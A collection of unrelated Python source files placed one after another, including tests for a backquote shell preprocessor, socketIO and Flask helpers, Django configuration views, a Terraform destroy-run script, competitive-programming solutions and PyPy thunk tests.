self.assertEqual(backquotes.__all__, ['shell', 'preprocess'])
def test___version__(self):
version = distutils.version.StrictVersion(backquotes.__version__)
self.assertTrue(version)
def test_shell(self):
spam = 'spam' # noqa
result = backquotes.shell('printf $spam | tr [a-z] [A-Z]')
self.assertEqual(result, 'SPAM')
def test_preprocess(self):
source = textwrap.dedent('''
spam = 'spam'
print(`printf $spam | tr [a-z] [A-Z]`)
''')
expected = textwrap.dedent("""
spam ='spam'
print (backquotes .shell (r'''printf $spam | tr [a-z] [A-Z]'''))
""")
with tempfile.NamedTemporaryFile('w+') as f:
f.write(source)
f.seek(0)
result = backquotes.preprocess(f.name, f.readline)
self.assertEqual(result, expected)
def test__append_to_python_path_when_python_path_is_not_set(self):
with EnvironmentVarGuard() as env:
del env['PYTHONPATH']
with backquotes._append_to_python_path('spam'):
self.assertEqual(env['PYTHONPATH'], 'spam')
def test__append_to_python_path_when_python_path_is_set(self):
with EnvironmentVarGuard() as env:
env['PYTHONPATH'] = 'spam'
with backquotes._append_to_python_path('ham'):
self.assertEqual(env['PYTHONPATH'], 'spam:ham')
def test__detect_environment_when_filename_is_stdin_and_file_does_not_exist(self):
frame = MagicMock()
frame.f_code.co_filename = '<stdin>'
frame.f_locals.get.return_value = None
self.assertEqual(backquotes._detect_environment(frame), 'repl')
def test__detect_environment_with_filename_is_stdin_and_file_exists(self):
frame = MagicMock()
frame.f_code.co_filename = '<stdin>'
frame.f_locals = {'__file__': 'spam'}
self.assertEqual(backquotes._detect_environment(frame), 'redirect')
def test__detect_environment_with_filename_is_not_stdin_and_name_is_not_main(self):
frame = MagicMock()
frame.f_code.co_filename = 'spam'
frame.f_back.f_locals = {'__name__': 'ham'}
self.assertEqual(backquotes._detect_environment(frame), 'module')
def test__detect_environment_with_filename_is_not_stdin_and_name_is_main(self):
frame = MagicMock()
frame.f_code.co_filename = 'spam'
frame.f_back.f_locals = {'__name__': '__main__'}
self.assertEqual(backquotes._detect_environment(frame), 'script')
def test__exec(self):
backquotes._exec('self.test__exec_result = True', globals(), locals())
self.assertTrue(self.test__exec_result)
del self.test__exec_result
def test__is_quoted(self):
self.assertTrue(backquotes._is_quoted('"spam"'))
self.assertFalse(backquotes._is_quoted('spam'))
self.assertFalse(backquotes._is_quoted('"spam\''))
def test__triple_quote(self):
result = backquotes._triple_quote('spam')
expected = "r'''spam'''"
self.assertEqual(result, expected)
def test__main_help(self):
with captured_stdout() as s:
self.assertRaises(SystemExit, backquotes._main, ['-h'])
self.assertIn('Usage:', s.getvalue())
self.assertRaises(SystemExit, backquotes._main, ['--help'])
self.assertIn('Usage:', s.getvalue())
def test__main_version(self):
with captured_stdout() as s:
self.assertRaises(SystemExit, backquotes._main, ['--version'])
self.assertEqual(backquotes.__version__ + '\n', s.getvalue())
def test__main_with_stdin(self):
with tempfile.NamedTemporaryFile('w+') as f:
f.write('import backquotes\n`echo spam`')
f.seek(0)
with patch('sys.stdin', new=f):
self.assertEqual(backquotes._main([]), 0)
def test_import_in_repl(self):
with tempfile.TemporaryFile('w+') as f:
f.write('import backquotes\n')
f.seek(0)
process = subprocess.Popen([sys.executable],
stdin=f,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = process.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UserWarning:', err)
def assertIn(self, member, container, msg=None):
try:
super(TestBackquotes, self).assertIn(member, container, msg)
except AttributeError:
self.assertTrue(member in container, msg)
|
# -*- coding: utf-8 -*-
import sys
import time
import logging
import os
from socketIO_client import SocketIO, BaseNamespace
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from websk.conf import SOCKET_HOST, SOCKET_PORT
logging.getLogger('socketIO-client').setLevel(logging.DEBUG)
logging.basicConfig()
class BaseSendMsgSocket(object):
"""这是短连接的websocket发送消息的类""" # TODO 可以继续完善出 长连接的类
def __init__(self, socket_host="127.0.0.1", socket_port=3000):
self.instance_socket = SocketIO(socket_host, socket_port)
def send_msg(self, namespace, topic, data):
class ChatNamespace(BaseNamespace):
def on_aaa_response(self, *args):
print('on_aaa_response', args)
chatNamespace = self.instance_socket.define(ChatNamespace, namespace)
chatNamespace.emit(topic, data)
self.instance_socket.wait(seconds=1) # TODO 可以优化seconds
class BaseRecvMsgSocket(object):
_msg_dict = None
def __init__(self, socket_host="127.0.0.1", socket_port=3000):
self.instance_socket = SocketIO(socket_host, socket_port)
def listen(self, namespace, topic):
class ChatNamespace(BaseNamespace):
def on_aaa_response(self, *args):
print('on_aaa_response', args)
chatnamespace = self.instance_socket.define(ChatNamespace, namespace)
def on_update_process(*args):
_msg_dict = [*args][0]
chatnamespace.on(topic, on_update_process)
self.instance_socket.wait()
@classmethod
def recv_msg(cls):
while True:
if cls._msg_dict is not None:
return BaseRecvMsgSocket._msg_dict
else:
time.sleep(0.1)
continue
if __name__ == '__main__':
namespace = '/test'
# namespace = ''
topic = 'heart ping'
# topic = ''
data = {"heart": 'ping'}
sk = BaseSendMsgSocket(socket_host=SOCKET_HOST, socket_port=SOCKET_PORT)
sk.send_msg(namespace, topic, data) |
from flask import Flask, render_template, request, redirect, url_for, flash
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from flask import session as login_session
import random
import string
from models.base import Base
from models.user import User
from models.store import Store
from models.product import Product
app = Flask(__name__)
engine = create_engine('postgresql://catalog:catalog@localhost:5432/catalog')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# DB query helper functions
def checkStore(store_id):
result = session.query(Store).filter_by(id=store_id).first()
if not result:
flash("Store ID doesn't exist!")
return result
def checkProduct(product_id):
result = session.query(Product).filter_by(id=product_id).first()
if not result:
flash("Product ID doesn't exist!")
return result
def checkUser(user_id):
result = session.query(User).filter_by(id=user_id).first()
if not result:
flash("User ID doesn't exist!")
return result
# Permissions helper functions
def checkLogin():
if 'user_id' not in login_session:
flash("Please log in with your Google+ account to make changes.")
return None
return True
def checkOwner(store_id):
store = checkStore(store_id)
owner = checkUser(store.user_id)
if owner.id != login_session['user_id']:
flash("You don't have permission to edit that store or its products.")
return None
return True
# User helper functions
def createUser(login_session):
newUser = User(name=login_session['username'], email=login_session['email'])
session.add(newUser)
session.commit()
user = session.query(User).filter_by(email=login_session['email']).first()
return user.id
def getUserID(email):
user = session.query(User).filter_by(email=email).first()
if not user:
return None
return user.id
# Create anti-forgery state token
def makeState():
state = ''.join(random.choice(string.ascii_uppercase + string.digits)
for x in xrange(32))
login_session['state'] = state
return state
|
import re
def minion_game(string):
vowels = re.compile('^[AEIOU]')
p_v = 0
p_c = 0
for x_i in range(len(string)):
if vowels.match(string[x_i]):
p_v += (len(string)-x_i)
else:
p_c += (len(string)-x_i)
if p_c > p_v:
print(f'Stuart {p_c}')
elif p_c < p_v:
print(f'Kevin {p_v}')
else:
print('Draw')
if __name__ == '__main__':
s = input()
minion_game(s)
|
import os
import subprocess
import string
builddir = "_build/"
toolchain = "arm-none-eabi-"
def get_data_addrs():
head, tail = os.path.split(os.getcwd())
disasm = builddir + tail + ".asm"
data_addr = []
# minAddr = -1
with open(disasm, "rb") as f:
for line in f:
item_list = line.split("\t")
if len(item_list) >= 4:
# if minAddr == -1:
# minAddr = int(item_list[0].split(":")[0], 16)
if (item_list[2] == ".word"):
data_addr.append(int(item_list[0].split(":")[0], 16)-65536)
data_addr = list(set(data_addr))
data_addr.sort()
# for i in range(len(data_addr)):
# print data_addr[i]
return data_addr
def is_hex(s):
try:
int(s, 16)
return True
except ValueError:
return False
def get_min_addr():
head, tail = os.path.split(os.getcwd())
elf_name = builddir + tail + ".elf"
command = toolchain + "nm " + elf_name + " | grep -i \" t \""
output = subprocess.check_output(command, shell=True)
names = output.split()
func_addr = []
first_func_name = ''
minAddr = int(names[0], 16)
for i in range(len(names)/3):
addr = int(names[3*i], 16)
if addr <= minAddr:
first_func_name = names[3*i+2]
minAddr = addr
return minAddr
def get_symb_addrs():
head, tail = os.path.split(os.getcwd())
elf_name = builddir + tail + ".elf"
command = toolchain + "nm " + elf_name + " | grep -i \" t \""
output = subprocess.check_output(command, shell=True)
names = output.split()
func_addr = []
first_func_name = ''
minAddr = int(names[0], 16)
for i in range(len(names)/3):
addr = int(names[3*i], 16)
if addr <= minAddr:
first_func_name = names[3*i+2]
minAddr = addr
# if minAddr >= 8 :
# minAddr -= 4
for i in range(len(names)/3):
# addr = int(names[3*i], 16) - minAddr
addr = int(names[3*i], 16) - 65536
func_addr.append(addr)
if names[3*i+2] == "main":
ent_addr = addr
func_addr = list(set(func_addr))
func_addr.sort()
func_addr.insert(0, ent_addr)
# for i in range(len(func_addr)):
# print func_addr[i]
elf_name = builddir + tail + ".4gem5"
command = toolchain + "nm " + elf_name + " | grep -i \" t \""
output = subprocess.check_output(command, shell=True)
names = output.split()
nNoName = 0
i = 0
while True:
if (3*i >= (len(names) + nNoName)):
break
if (is_hex(names[3*i+2-nNoName])):
nNoName += 1
if names[3*i+2-nNoName] == first_func_name:
func_addr.insert(0, int(names[3*i-nNoName], 16))
i += 1
return func_addr
#if __name__ == "__main__":
# get_ent_addr()
# get_data_addr()
# get_func_addr()
|
from __future__ import annotations
from typing import Generator, NoReturn
class StdReader:
def __init__(
self,
) -> NoReturn:
import sys
self.buf = sys.stdin.buffer
self.lines = (
self.async_readlines()
)
self.chunks: Generator
def async_readlines(
self,
) -> Generator:
while True:
gen = self.line_chunks()
yield gen
def line_chunks(
self,
) -> Generator:
ln = self.buf.readline()
for chunk in ln.split():
yield chunk
def __call__(
self,
) -> bytes:
try:
chunk = next(self.chunks)
except:
self.chunks = next(
self.lines,
)
chunk = self()
return chunk
def str(
self,
) -> str:
b = self()
return b.decode()
def int(
self,
) -> int:
return int(self.str())
from abc import ABC, abstractmethod
class Solver(ABC):
def __init__(self):
self.reader = StdReader()
def __call__(
self,
):
self.prepare()
self.solve()
@abstractmethod
def prepare(self):
...
@abstractmethod
def solve(self):
...
import numpy as np
class NumpyModular:
mod: int = None
def __init__(
self,
mod: int,
):
self.mod = mod
def mat_pow(
self,
a: np.ndarray,
n: int,
) -> np.ndarray:
if n == 0:
e = np.identity(
a.shape[0],
dtype=np.int64,
)
return e
x = self.mat_pow(a, n >> 1)
x = self.mat_dot(x, x)
if n & 1:
x = self.mat_dot(x, a)
return x
def mat_dot(
self,
a: np.ndarray,
b: np.ndarray,
):
mod = self.mod
N = 15
MASK = (1 << N) - 1
a0, a1 = a & MASK, a >> N
b0, b1 = b & MASK, b >> N
c0 = np.dot(a0, b0) % mod
c2 = np.dot(a1, b1) % mod
c1 = np.dot(
a0 + a1,
b0 + b1,
) - c0 - c2
c1 %= mod
c = c2 << N * 2
c += c1 << N
c += c0
c %= mod
return c
def inv(self, n: int):
p = self.mod
n = int(n)
return pow(n, p - 2, p)
def cumprod(self, a):
l = len(a)
n = int(np.sqrt(l) + 1)
a = np.resize(a, (n, n))
for i in range(n-1):
a[:, i + 1] *= a[:, i]
a[:, i + 1] %= self.mod
for i in range(n-1):
a[i + 1] *= a[i, -1]
a[i + 1] %= self.mod
return np.ravel(a)[:l]
def factorial(self, n: int):
fact = np.arange(n)
fact[0] = 1
return self.cumprod(fact)
def inv_factorial(
self,
n: int,
):
fact = self.factorial(n)
ifact = np.arange(1, n + 1)
ifact[-1] = self.inv(
fact[-1],
)
return self.cumprod(
ifact[::-1],
)[n::-1]
mod = 10 ** 9 + 7
class Problem(
Solver,
):
def prepare(self):
reader = self.reader
n = reader.int()
m = reader.int()
k = reader.int()
a = [
reader.int()
for _ in range(n)
]
a = np.array(a)
xy = [
reader.int()
for _ in range(2 * m)
]
xy = np.array(
xy,
).reshape(m, 2) - 1
self.n = n
self.m = m
self.k = k
self.a = a
self.xy = xy
def solve(self):
self.make_graph()
np_mod = NumpyModular(mod)
g = self.g
k = self.k
g = np_mod.mat_pow(g, k)
a = self.a
a = np_mod.mat_dot(g, a)
a = a.ravel()
print(*a, sep='\n')
def make_graph(self):
n = self.n
g = np.identity(
n,
dtype=np.int64,
)
m = self.m
g *= m * 2
xy = self.xy
x, y = xy.T
np.add.at(g, (x, x), -1)
np.add.at(g, (y, y), -1)
np.add.at(g, (x, y), 1)
np.add.at(g, (y, x), 1)
b = pow(
2 * m,
mod - 2,
mod,
)
g *= b
g %= mod
self.g = g
def main():
t = 1
# t = StdReader().int()
for _ in range(t):
Problem()()
if __name__ == '__main__':
main()
|
list1=[12, -7, 5, 64, -14]
for i in list1:
if i < 0 :
continue
print(i)
list2=[12, 14, -95, 3]
for i in list2:
if i < 0:
continue
print(i)
|
import os
import json
from app.data import constants, stats, equations, tags, weapons, factions, terrain, mcost, \
minimap, items, klass, units, parties, ai, difficulty_modes, translations, skills, levels, \
lore, supports, overworld, overworld_node
from app.events import event_prefab
import logging
class Database(object):
save_data_types = ("constants", "stats", "equations", "mcost", "terrain", "weapon_ranks",
"weapons", "factions", "items", "skills", "tags", "classes",
"support_constants", "support_ranks", "affinities", "units", "support_pairs",
"ai", "parties", "difficulty_modes",
"translations", "lore", "levels", "events", "overworlds")
def __init__(self):
self.constants = constants.constants
self.teams = ["player", "enemy", "enemy2", "other"] # Order determine phase order
self.stats = stats.StatCatalog()
self.equations = equations.EquationCatalog()
self.mcost = mcost.McostGrid()
self.terrain = terrain.TerrainCatalog()
self.minimap = minimap.MinimapCatalog()
self.weapon_ranks = weapons.RankCatalog()
self.weapons = weapons.WeaponCatalog()
self.factions = factions.FactionCatalog()
self.items = items.ItemCatalog()
self.skills = skills.SkillCatalog()
self.tags = tags.TagCatalog(['Lord', 'Boss', 'Armor', 'Horse', 'Mounted', 'Dragon', 'ZeroMove', 'AutoPromote', 'NoAutoPromote'])
self.classes = klass.ClassCatalog()
self.support_constants = supports.constants
self.support_ranks = supports.SupportRankCatalog(['C', 'B', 'A'])
self.affinities = supports.AffinityCatalog()
self.units = units.UnitCatalog()
self.support_pairs = supports.SupportPairCatalog()
self.parties = parties.PartyCatalog()
self.ai = ai.AICatalog()
self.difficulty_modes = difficulty_modes.DifficultyModeCatalog()
self.overworlds = overworld.OverworldCatalog()
self.levels = levels.LevelCatalog()
self.events = event_prefab.EventCatalog()
self.translations = translations.TranslationCatalog()
self.lore = lore.LoreCatalog()
# === Saving and loading important data functions ===
def restore(self, save_obj):
for data_type in self.save_data_types:
logging.info("Database: Restoring %s..." % data_type)
getattr(self, data_type).restore(save_obj[data_type])
def save(self):
# import time
to_save = {}
for data_type in self.save_data_types:
# logging.info("Saving %s..." % data_type)
# time1 = time.time_ns()/1e6
to_save[data_type] = getattr(self, data_type).save()
# time2 = time.time_ns()/1e6 - time1
# logging.info("Time taken: %s ms" % time2)
return to_save
def serialize(self, proj_dir):
data_dir = os.path.join(proj_dir, 'game_data')
if not os.path.exists(data_dir):
os.mkdir(data_dir)
logging.info("Serializing data in %s..." % data_dir)
import time
start = time.time_ns()/1e6
to_save = self.save()
# This section is what takes so long!
for key, value in to_save.items():
temp_save_loc = os.path.join(data_dir, key + '_temp.json')
save_loc = os.path.join(data_dir, key + '.json')
logging.info("Serializing %s to %s" % (key, save_loc))
with open(temp_save_loc, 'w') as serialize_file:
json.dump(value, serialize_file, indent=4)
os.replace(temp_save_loc, save_loc)
end = time.time_ns()/1e6
logging.info("Total Time Taken for Database: %s ms" % (end - start))
logging.info("Done serializing!")
def load(self, proj_dir):
data_dir = os.path.join(proj_dir, 'game_data')
logging.info("Deserializing data from %s..." % data_dir)
save_obj = {}
for key in self.save_data_types:
save_loc = os.path.join(data_dir, key + '.json')
if os.path.exists(save_loc):
logging.info("Deserializing %s from %s" % (key, save_loc))
with open(save_loc) as load_file:
save_obj[key] = json.load(load_file)
else:
logging.warning("%s does not exist!" % save_loc)
save_obj[key] = []
self.restore(save_obj)
logging.info("Done deserializing!")
DB = Database()
# Testing
# Run "python -m app.data.database" from main directory
|
from __future__ import annotations
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from .Graph import Graph
import glm
class PointLight:
def __init__(self, graph: Graph, pos: glm.vec3,
ambient: glm.vec3, diffuse: glm.vec3, specular: glm.vec3,
k: glm.vec3):
self.graph = graph
self.graph.addLights(self)
self.position = pos
self.ambient = ambient
self.diffuse = diffuse
self.specular = specular
self.k = k
|
"""
Main function for running transBG jobs.
Examples:
--------
* If you define an "input.json" with desired job parameters in job_dir/:
(transBG) ~/transBG$ python main.py --job_dir path/to/job_dir/
* If you instead want to run your job using the submission scripts:
(transBG) ~/transBG$ python submit-fine-tuning.py
This script is addapted from https://github.com/MolecularAI/GraphINVENT/blob/bdd69ffd11816f8781be9fc8f807750375f61809/graphinvent/main.py
"""
# load general packages and functions
import datetime
import json
import torch
# load transBG-specific functions
from utils.load_parameters import load_parameters
from utils.command_line_args import args
from transBG import TransBG
def main():
"""
Defines the type of job (preprocessing, training, generation, testing, or
fine-tuning), writes the job parameters (for future reference), and runs
the job.
"""
_ = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") # fix date/time
with open(args.job_dir+"input.json") as json_file:
params_dict = json.load(json_file)
class Struct:
def __init__(self, **entries):
self.__dict__.update(entries)
params = Struct(**params_dict)
# create an instance of a transBG object
conformer_gen = TransBG(params)
conformer_gen.build_model()
job_type = params.job_type
print(f"* Run mode: '{job_type}'", flush=True)
if job_type == "likelihood":
# train model with only likelihood-based learning using all the molecules in the dataset
conformer_gen.train_likelihood()
elif job_type == "energy":
# fine-tune the model with energy based learning using a smaller set of molecules (energy_train_indices)
conformer_gen.model.load_state_dict(torch.load(params.pre_trained_model))
if params.finetune_l:
conformer_gen.finetune_likelihood()
conformer_gen.train_energy()
else:
raise NotImplementedError("Not a valid `job_type`.")
if __name__ == "__main__":
main()
|
import json, requests, datetime, ast
from .profiler_test import profile
from administer import context_processors,helper
from django.contrib import messages
from django.db import IntegrityError
from django.shortcuts import render
from administer.models import Services, Nodes,Service_cluster_reference
from administer.helper import helper
from .models import User_preferred_configuration, Backup_configuration, Restart_after_configuration, sync_configuration,Default_configuration
from django.http import JsonResponse
# Create your views here.
def index_add(request):
context = context_processors.base_variables_all(request)
context["action"]="add"
return render(request, 'configuraion/configuration.html', context)
def index_edit(request):
context = context_processors.base_variables_all(request)
context["action"] = "edit"
return render(request, 'configuraion/configuration.html',context)
def index_show(request):
context = context_processors.base_variables_all(request)
node = Nodes.objects.all()
context["node"] = node
context["action"] = "show"
return render(request, 'configuraion/configuration_copy.html', context)
def index_show_backup(request, id):
context = context_processors.base_variables_all(request)
node = Nodes.objects.all()
context["node"] = node
context["action"] = "backup"
return render(request, 'configuraion/configuration.html', context)
def add_configure_service(request, service):
service_object = Services.objects.get(name=service)
key_configurations_users = User_preferred_configuration.objects.filter(service_id=service_object.id)
key_configurations = Default_configuration.objects.exclude(name__in=[x.key_name for x in key_configurations_users]).filter(service_id=service_object.id)
nodes_configuration = helper(request).get_all_nodes()
context = context_processors.base_variables_all(request)
context["key_configurations"] = key_configurations
context["id"] = service_object.id
context["service_name"] = service
context["nodes_configuration"] = nodes_configuration
return render(request, 'configuraion/configure_service.html', context)
def add_configure_service_ajax(request):
if request.is_ajax and request.method == "POST":
key_name = request.POST['key_name']
key_value = request.POST['key_value']
key_type = request.POST['key_type']
nodes_submit = request.POST.getlist('nodes')
service_id = request.POST['service_id']
nodes_submit = ast.literal_eval(nodes_submit[0])
if nodes_submit == '[]':
delete_user_preffered = User_preferred_configuration.objects.filter(key_name=key_name)
delete_user_preffered.delete()
data = {'success': True}
return JsonResponse(data)
else:
configure_row_user = User_preferred_configuration.objects.filter(key_name=key_name,
service_id=service_id,
key_type=key_type).exists()
if configure_row_user:
row_user1 = User_preferred_configuration.objects.filter(key_name=key_name, service_id=service_id,
key_type=key_type)
value_dict = {}
for node in nodes_submit:
value_dict[str(node)] = key_value
row_user1.update(value=value_dict)
data = {'success': True}
return JsonResponse(data)
else:
value_dict = {}
for node in nodes_submit:
value_dict[str(node)] = key_value
create_conf_user = User_preferred_configuration(service_id=service_id, key_name=key_name,
value=value_dict, key_type=key_type)
create_conf_user.save()
data = {'success': True}
return JsonResponse(data)
def edit_configure_submit_ajax(request):
if request.is_ajax and request.method == "POST":
key_name = request.POST['key_name']
key_value = request.POST['key_value']
key_type = request.POST['key_type']
service_id = request.POST['service_id']
configure_row_user = User_preferred_configuration.objects.filter(key_name=key_name,
service_id=service_id,
key_type=key_type).exists()
if configure_row_user:
row_user1 = User_preferred_configuration.objects.filter(key_name=key_name, service_id=service_id,
key_type=key_type)
row_user1.update(value=key_value)
data = {'success': True}
return JsonResponse(data)
else:
create_conf_user = User_preferred_configuration(service_id=service_id, key_name=key_name,
value=key_value, key_type=key_type)
create_conf_user.save()
data = {'success': True}
return JsonResponse(data)
def add_configure_nodes_save(request):
nodes = helper(request).get_all_nodes()
service_id = request.POST['service_id']
for node in nodes:
configuration = {}
row_user_types = User_preferred_configuration.objects.order_by().values('key_type').distinct() \
.filter(value__contains=node, service_id=service_id)
for row_user_type in row_user_types:
configuration_inside = {}
row_users = User_preferred_configuration.objects.filter(key_type=row_user_type['key_type'], value__contains=node)
for row_user in row_users:
value = ast.literal_eval(row_user.value)
configuration_inside[row_user.key_name] = value[str(node)]
configuration[row_user_type['key_type']] = configuration_inside
url = "http://%s:11605/config/" % node
response = requests.post(url, data=json.dumps(configuration), headers={"API-KEY": helper.get_api_key()})
response_dict = json.loads(response.content.decode())
if response_dict["success"] == 0:
data = {
'success': False
}
return JsonResponse(data)
data = {
'success': True
}
restart_service_check = Restart_after_configuration.objects.filter(service_id=service_id).exists()
if restart_service_check:
restart_service = Restart_after_configuration.objects.get(service_id=service_id)
restart_service.status = 1
restart_service.save()
else:
restart_service = Restart_after_configuration(service_id=service_id, status=1)
restart_service.save()
return JsonResponse(data)
def edit_configure_service(request, service):
context = context_processors.base_variables_all(request)
service_object = Services.objects.get(name=service)
nodes_configuration = helper(request).get_all_nodes()
key_configurations = User_preferred_configuration.objects.filter(service_id=service_object.id)
context["key_configurations"]=key_configurations
context["id"]=service_object.id
context["service_name"]=service
context["nodes_configuration"]=nodes_configuration
return render(request, 'configuraion/edit_configuration.html', context)
def show_configure_service(request):
context = context_processors.base_variables_all(request)
node = request.GET["node"]
service = request.GET["service_id"]
key_configurations = User_preferred_configuration.objects.filter(service_id=service, value__contains=node)
if key_configurations:
key_configuration_list = []
for key_configuration in key_configurations:
key_configuration_dict = {}
key_configuration_dict["key"] = key_configuration.key_name
key_configuration_dict["type"] = key_configuration.key_type
value = ast.literal_eval(key_configuration.value)
key_configuration_dict["value"] = value[str(node)]
key_configuration_list.append(key_configuration_dict)
context["key_configurations"] = key_configuration_list
backup_key_configurations = Backup_configuration.objects.filter(service_id=service, value__contains=node)
if backup_key_configurations:
backup_key_configurations_list = []
for key_configuration in backup_key_configurations:
backup_key_configurations_dict = {}
backup_key_configurations_dict["key"] = key_configuration.key_name
backup_key_configurations_dict["type"] = key_configuration.key_type
value = ast.literal_eval(key_configuration.value)
backup_key_configurations_dict["value"] = value[str(node)]
backup_key_configurations_list.append(backup_key_configurations_dict)
context["backup_key_configurations"] = backup_key_configurations_list
context["node_ip"] = node
context["service_name"] = service
return render(request, 'configuraion/show_configuration.html', context)
def sync_configurations(request):
try:
data = ""
user_configurations = User_preferred_configuration.objects.all()
backup_configurations = Backup_configuration.objects.all()
if backup_configurations:
backup_configurations.delete()
if user_configurations:
try:
for user_configuration in user_configurations:
user_configuration_dict = user_configuration.__dict__
user_configuration_dict.pop('id')
user_configuration_dict.pop('_state')
Backup_configuration.objects.create(**user_configuration_dict)
user_name_sync = request.user.username
last_sync = datetime.datetime.now()
sync_configuration.objects.create(sync_by=user_name_sync, last_sync=last_sync)
data = {
'success': True
}
except Exception as e:
data = {
'success': False,
'msg': '%s' % e
}
return JsonResponse(data)
else:
data = {
'success': False,
'msg': 'user configuration table is empty'
}
except Exception as e:
data = {
'success': False,
'msg': '%s' % e
}
return JsonResponse(data)
def revert_configuration(request):
try:
user_configurations = User_preferred_configuration.objects.all()
backup_configurations = Backup_configuration.objects.all()
if user_configurations:
user_configurations.delete()
if backup_configurations:
for backup_configuration in backup_configurations:
backup_configuration_dict = backup_configuration.__dict__
backup_configuration_dict.pop('id')
backup_configuration_dict.pop('_state')
User_preferred_configuration.objects.create(**backup_configuration_dict)
data = {
'success': True
}
else:
data = {
'success': False,
'msg': "backup table is empty...revert aborted"
}
except Exception as e:
data = {
'success': False,
'msg': '%s' % e
}
return JsonResponse(data)
def add_configure_service_other_ajax(request):
other_configurations = request.POST['other_configurations']
service_id = request.POST['service_id']
other_configurations = json.loads(other_configurations)
list_data = []
for other_configuration in other_configurations:
try:
for other_configuration_type in other_configuration['type']:
value_dict = {}
for node in other_configuration['node']:
value_dict[str(node)] = other_configuration['value']
User_preferred_configuration.objects.create(service_id=service_id, key_name=other_configuration['key'],
value=value_dict, key_type=other_configuration_type)
data = {
'success': True,
}
list_data.append(data)
except IntegrityError as e:
data = {
'success': False,
'msg': 'key_name duplicate *%s' % other_configuration['key'],
}
list_data.append(data)
list_data1 = {'list_data': list_data}
return JsonResponse(list_data1)
def settings(request):
return render(request, 'settings/setting.html')
def show_backup_configurations(request):
key_configurations = Backup_configuration.objects.all()
return render(request, 'configuraion/backup_configuration.html', {"key_configurations": key_configurations})
def show_backup_configure_service(request, node, service):
context = context_processors.base_variables_all(request)
service_id = Services.objects.get(name=service).id
node_ip = Nodes.objects.get(id=node).ip
key_configurations = Backup_configuration.objects.filter(service_id=service_id, value__contains=node_ip)
context["key_configurations"] = key_configurations
context["node_ip"] = node_ip
context["service_name"] = service
return render(request, 'configuraion/backup_configuration.html', context)
|
from .post_translation import PostTranslationService
from .interface import (
PostTranslationConfig,
PostTranslationRequest,
PostTranslationResponse,
)
|
# Generated by Django 3.2.8 on 2022-01-05 20:22
import cloudinary.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('thehood', '0005_auto_20220105_1750'),
]
operations = [
migrations.CreateModel(
name='NeighbourHood',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('location', models.CharField(max_length=60)),
('photo', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
('description', models.TextField()),
('occupants_count', models.IntegerField(blank=True, default=0)),
('health_toll', models.IntegerField(blank=True, null=True)),
('police_toll', models.IntegerField(blank=True, null=True)),
('admin', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='hood', to='thehood.profile')),
],
),
]
|
from . import BlobDetector
|
import os
import sys
from terrasnek.api import TFC
def queue_destroy_run(api, workspace_name):
workspace = api.workspaces.show(workspace_name)
if workspace == None:
print('Error: unable to find a workspace named ' + workspace_name)
exit(1)
workspace_id = workspace["data"]["id"]
payload = {
"data": {
"attributes": {
"is-destroy": True
},
"relationships": {
"workspace": {
"data": {
"id": workspace_id
}
}
}
}
}
run = api.runs.create(payload)
if run == None:
print('Error: Unable to queue destroy plan. The provided token probably does not have "apply" permission.')
exit(1)
run_id = run["data"]["id"]
return run_id
if __name__ == "__main__":
if len(sys.argv) != 2:
print('Usage: python3 destroy-plan.py [workspace-name]')
print('')
print('Please also ensure that the following environment variables are set to the appropriate values for your TFE install:')
print(' * TFE_TOKEN')
print(' * TFE_URL')
print(' * TFE_ORG')
exit(1)
TFE_TOKEN = os.getenv("TFE_TOKEN", None)
TFE_URL = os.getenv("TFE_URL", None)
TFE_ORG = os.getenv("TFE_ORG", None)
api = TFC(TFE_TOKEN, url=TFE_URL)
api.set_org(TFE_ORG)
destroy_run_id = queue_destroy_run(api, sys.argv[1])
print('Successfully queued destroy plan') |
from pypy.conftest import gettestobjspace
from pypy.interpreter import gateway
class AppTest_Thunk:
def setup_class(cls):
cls.space = gettestobjspace('thunk')
def test_simple(self):
from __pypy__ import thunk, become
computed = []
def f():
computed.append(True)
return 6*7
x = thunk(f)
assert computed == []
t = type(x)
assert t is int
assert computed == [True]
t = type(x)
assert t is int
assert computed == [True]
def test_setitem(self):
from __pypy__ import thunk, become
computed = []
def f(a):
computed.append(True)
return a*7
x = thunk(f, 6)
d = {5: x}
d[6] = x
d[7] = []
d[7].append(x)
assert computed == []
y = d[5], d[6], d.values(), d.items()
assert computed == []
d[7][0] += 1
assert computed == [True]
assert d[7] == [43]
def test_become(self):
from __pypy__ import thunk, become
x = []
y = []
assert x is not y
become(x, y)
assert x is y
def test_id(self):
from __pypy__ import thunk, become
# these are the Smalltalk semantics of become().
x = []; idx = id(x)
y = []; idy = id(y)
assert idx != idy
become(x, y)
assert id(x) == id(y) == idy
def test_double_become(self):
skip("fix me")
from __pypy__ import thunk, become
x = [1]
y = [2]
z = [3]
become(x, y)
become(y, z)
assert x is y is z
a = []
a.extend(x)
a.extend(y)
a.extend(z)
assert a == [3, 3, 3]
def test_double_become2(self):
from __pypy__ import thunk, become
x = []
y = []
z = []
become(x, y)
become(x, z)
assert x is y is z
def test_thunk_forcing_while_forcing(self):
from __pypy__ import thunk, become
def f():
return x+1
x = thunk(f)
raises(RuntimeError, 'x+1')
def test_thunk_forcing_while_forcing_2(self):
from __pypy__ import thunk, become
def f():
return x
x = thunk(f)
raises(RuntimeError, 'x+1')
def test_is_thunk(self):
from __pypy__ import thunk, become, is_thunk
def f():
pass
assert is_thunk(thunk(f))
assert not is_thunk(42)
def test_is_thunk2(self):
from __pypy__ import thunk, become, is_thunk
def f():
return 42
x = thunk(f)
assert is_thunk(x)
assert x == 42
assert not is_thunk(x)
def test_is_thunk_become(self):
from __pypy__ import thunk, become, is_thunk
def f():
return 42
x = thunk(f)
y = []
become(y, x)
assert is_thunk(y)
assert y == 42
assert not is_thunk(y)
def test_lazy(self):
from __pypy__ import lazy
lst = []
def f(x):
lst.append(x)
return x+5
